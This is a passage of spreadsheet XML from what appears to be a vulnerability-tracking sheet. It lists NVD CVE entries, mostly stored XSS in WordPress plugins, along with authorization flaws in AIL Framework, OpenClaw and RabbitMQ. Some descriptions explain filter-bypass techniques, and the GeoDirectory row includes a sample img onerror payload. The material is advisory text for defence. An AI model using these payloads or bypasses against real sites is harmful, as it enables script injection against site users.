      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <t>The Automatic.css plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REQUEST_URI in all version 4.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute whenever an administrator accesses the Activity Log settings page.</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15273</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92746</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <t>The Gutenverse – WordPress Blocks, Page Builder &amp; Site Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Post Comment Block 'suffixMain' Attribute in all versions up to, and including, 4.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. WordPress core wp_kses_post sanitization does not mitigate this vulnerability because the payload is stored inside a Gutenberg block delimiter comment rather than as a raw HTML tag, and is only rendered as exploitable HTML at the PHP render stage.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92746</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93656</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>The User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Avatar Field in all versions up to, and including, 4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is exploitable via a nonce-free GET request to /wp-admin/profile.php, requiring no profile-form submission; a Subscriber can plant the malicious attachment URL, which then executes when an administrator opens that user's Edit User screen.</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93656</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93747</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>The wpForo Forum plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'telegram' profile field in versions up to, and including, 3.1.6. This is due to insufficient input sanitization and output escaping in the profile_update action — the raw $_POST['data'] array is copied into a $custom_fields variable before validate() and sanitize() run, both of which operate only on a parallel $user reference, leaving $custom_fields unsanitized when it is persisted via update_custom_fields(); on render, wpforo_decode() reverses the entity encoding and the value is echoed without escaping in field_wrap_profile(). This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93747</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93897</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>The GeoDirectory – WP Business Directory Plugin and Classified Listings Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Text-type Custom Field (e.g., 'phone') in all versions up to, and including, 2.8.181 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The payload must be stored in a text-type custom field (such as a phone field) via the AJAX geodir_save_post endpoint, using entity-encoded angle brackets (e.g., &amp;lt;img src=x onerror=alert(1)&amp;gt;) to bypass the strpos()-gated tag-stripping check.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93897</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94376</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <t>The Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots plugin for WordPress is vulnerable to Stored DOM-Based Cross-Site Scripting via User Display Name in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is exploitable by Subscriber-level users because WordPress core's sanitize_text_field() preserves HTML-entity-encoded payloads (e.g., an iframe srcdoc attribute), allowing the encoded string to be stored as a display name without requiring the unfiltered_html capability, and the plugin subsequently decodes it server-side before rendering.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94376</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96766</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>The GeoDirectory – WP Business Directory Plugin and Classified Listings Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'business_hours' parameter in all versions up to, and including, 2.8.183 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is possible because the AJAX save handler validates only post authorship and a nonce with no additional capability check, allowing any subscriber-level user who owns a listing to exploit this vulnerability.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96766</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100177</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-639</t>
        </is>
      </c>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework crawler task creation API (api_add_crawler_task) contained an insufficient authorization check when a user supplied a cookiejar UUID to attach to a one-shot or scheduled crawler task. The original code only verified that the cookiejar existed and, if its access level was 0, compared the cookiejar's owning user ID to the requesting user ID. It did not validate organizational boundaries, did not account for the requesting user's role. When the cookiejar level was not 0, no access check was performed at all. An authenticated user could therefore reference another organization's cookiejar by UUID and have the crawler use that organization's stored cookies (session tokens, authentication credentials) when performing web crawls, effectively leaking or exfiltrating the victim organization's session data.
The vulnerability requires an authenticated user with the ability to create crawler tasks. The attacker must know or guess a valid cookiejar UUID belonging to another organization. The impact is unauthorized access to another organization's stored cookies and session data through the crawler infrastructure.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100177</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100190</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework crawler splash domain page (showDomain.html) is vulnerable to stored cross-site script injection (XSS). User-supplied data originating from imported crawler captures—specifically item IDs, URLs, and screenshot file paths—was interpolated directly into inline JavaScript contexts within the HTML template. This included an onclick attribute that embedded raw screenshot and URL values into a JavaScript function call, and an inline script block that assigned a screenshot value to a JavaScript variable without escaping. An attacker with a user-role API client could craft a malicious crawler capture import containing JavaScript payloads in these fields. When any user (including privileged users) subsequently viewed the affected domain page, the injected script would execute in the victim's browser context, potentially allowing session hijacking, data exfiltration, or unauthorized actions on behalf of the victim. The vulnerability is stored in the application's data layer and triggered upon page rendering, requiring no further interaction beyond loading the domain view.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100190</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100556</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr">
        <is>
          <t>sap, npm, gin</t>
        </is>
      </c>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package openclaw) versions &gt;= 2026.5.2 and &lt; 2026.8.1 contain an incorrect authorization vulnerability in WhatsApp group handling. A group sender who is admitted for ordinary messages but denied by commands.allowFrom or owner command authorization can issue the /new &lt;model&gt; command to reset the shared group session and persist a provider and model override. This allows a command-denied group member to select a provider and model already permitted by the operator for subsequent turns in the shared group session, potentially changing provider routing, cost, data flow, or availability. It does not allow adding a new provider or host command execution. The issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100556</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100577</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 fail to validate video asset URLs returned by providers, allowing server-side requests to private destinations. A malicious or compromised provider can return private or loopback URLs to cause the CLI to make requests to internal services accessible from the OpenClaw host.</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100577</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100591</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr">
        <is>
          <t>npm, go</t>
        </is>
      </c>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S274" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an npm-distributed agent gateway. In versions before 2026.7.1, the global Active Memory toggle mutations could omit owner checks. An authorized non-owner external-channel sender could therefore persistently enable or disable Active Memory for the Gateway, disabling memory recall for future sessions or re-enabling global recall where the owner expected it to remain disabled. The issue is limited to persistent global on/off mutations; session-level controls and read-only status remain governed by existing command policy. The issue is fixed in version 2026.7.1. (Suggested title: "OpenClaw before 2026.7.1 missing owner authorization check on Active Memory global toggles".)</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100591</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100592</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr"/>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr">
        <is>
          <t>npm, go</t>
        </is>
      </c>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S275" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an agent gateway distributed via npm. In versions &gt;= 2026.4.10 and &lt; 2026.7.1, persistent memory dreaming mutations omit owner permission checks. An authorized but non-owner external-channel sender can issue the persistent '/dreaming on' and '/dreaming off' commands to enable or disable the Gateway's Memory Core dreaming behavior, disabling background memory processing or re-enabling durable memory promotion where the owner expected it to remain disabled; the practical confidentiality, integrity, and availability impact depends on stored conversation material and subsequent memory use. Read-only status and help commands remain governed by normal command policy. The issue is fixed in version 2026.7.1. As a workaround, disable dreaming commands in external channels or restrict channel command access to owners.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100592</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61837</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-862</t>
        </is>
      </c>
      <c r="S276" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.3.3, 4.2.9, 4.1.14, and 4.0.23, AMQP 1.0 management GET /bindings exposes full binding topology to any authenticated AMQP user without resource/management permission checks. the AMQP 1.0 HTTP-over-AMQP management endpoint GET /bindings (the rabbitamqpmanagement handler) enumerates bindings between an arbitrary source exchange and destination queue/exchange in the caller's virtual host without performing any resource-level permission check. Unlike every sibling operation in the same module (which call checkresourceaccess / bindingchecks), the GET handler ignores the authenticated User and returns the binding list unchanged. As a result, any authenticated AMQP 1.0 client that can open a management link pair , including users with no management/monitoring/policymaker/administrator tag , can enumerate the complete binding topology (source exchanges, destination queues/exchanges, routing keys, and binding arguments) of the virtual host they can access. The equivalent HTTP management API (GET /api/bindings) Confidentiality impact: a non-management AMQP 1.0 user can enumerate the complete routing topology of any virtual host it can connect to , every (source exchange, destination queue/exchange, routing key, binding arguments) This issue is fixed in versions 4.3.3, 4.2.9, 4.1.14, and 4.0.23.</t>
        </is>
      </c>
